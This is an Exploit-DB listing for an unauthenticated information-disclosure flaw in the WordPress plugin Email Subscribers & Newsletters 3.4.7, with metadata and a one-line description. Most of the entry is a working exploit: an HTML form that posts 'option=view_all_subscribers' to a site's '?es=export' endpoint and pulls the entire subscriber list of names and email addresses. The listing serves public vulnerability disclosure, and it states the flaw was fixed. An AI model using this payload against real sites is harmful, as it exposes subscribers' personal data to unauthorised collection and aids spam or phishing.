WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

EDB-ID: 43872
Author: ThreatPress Security
Published: 2018-01-24
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: Download Vulnerable Application 

 # Google Dork: 
 # Date: 2018-01-23 
 # Exploit Author: ThreatPress Security 
 # Vendor Homepage: http://icegram.com/ 
 # Software Link: https://wordpress.org/plugins/email-subscribers/ 
 # Version: 3.4.7 
 # Tested on: WordPress 4.9.2 
 # CVE : 
  
 Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
 the vulnerability that allows an unauthenticated user to download the entire subscriber 
list with names and e-mail addresses. 
  
 Exploit: 
  
 <form action="http://DOMAINTOTEST.com/?es=export" method="post"> 
     <input type="text" name="option" value="view_all_subscribers" /> 
     <input type="submit" value="Exploit" /> 
 </form>

Source: www.exploit-db.com
Related Posts